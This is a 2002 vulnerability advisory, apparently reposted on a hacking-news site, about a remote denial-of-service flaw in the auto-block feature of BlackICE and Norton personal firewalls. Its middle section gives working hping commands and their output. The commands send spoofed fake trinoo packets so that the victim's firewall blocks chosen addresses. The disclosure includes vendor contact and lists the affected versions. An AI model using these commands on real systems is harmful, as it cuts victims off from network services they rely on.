Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Multiple Vendor PC Firewall Remote Denial Of Services Vulnerability

Multiple Vendor PC Firewall Remote Denial Of Services Vulnerability

by Nikola Strahija on October 10th, 2002 From: Yiming Gong (yiming_at_security.zz.ha.cn) Overview In a default installation, some personal firewall software will work with auto-block function on, and this time if you fake a high level dangerous attack packet with spoof address target these pc, these firewall will immediately block the spoofed ip address without any further judgement. Thus, an intruders might quickly block quite a great internet address for a victim pc remotely.


Example
There is test on BlackICE and Norton personal firewall

Below are the steps and result of the test on BlackICE,

step 1:A clean and DEFAULT installation of blackice defender for server(version 2.9.cap) on a win2k server pc,which ip address is ip.add.of.victim

step 2:On a linux box with hping (a free soft can get from www.hping.org) installed,perform the following three commands:

---
[[email protected]]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.
of.dnsserver
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[[email protected]]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a
www.google.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[[email protected]]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a
www.networkice.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
---
These three commands all do the same thing:send fake trinoo communication udp packet to our target machine ip.add.of.victim with spoofed ip adress. ( google,networkeice,and ip.add.of.dnsserver-our dns server) result:Each time the command executed,the blackice icon on the windows system tray flash,and an entries added in blackice 's Advanced Frirewall Settings automatically whick block all the packet of the spoofed address.And the spoofed ip address is unreachable immediately. The test steps and result of Norton personal firewall are almost the same, using hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc -c 2 -a ip.of.spoofed.address instead.

Vendor Response
It is contacted [email protected] and [email protected] on Sep 24, 2002, Symantec told me they have forwarded my concerns on to the appropriate team, and BlackIce reply me As the product exists now, there is nothing that can be done to correct this. And they are in the hopes that something can be done in a future release.

Affected Versions:
--
Tested product:
BlackICE Defender for server version 2.9.cap
BlackICE Server Protection version 3.5.cdf
Norton personal firewall 2002 (version 4.0)
All are vulnerable.


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »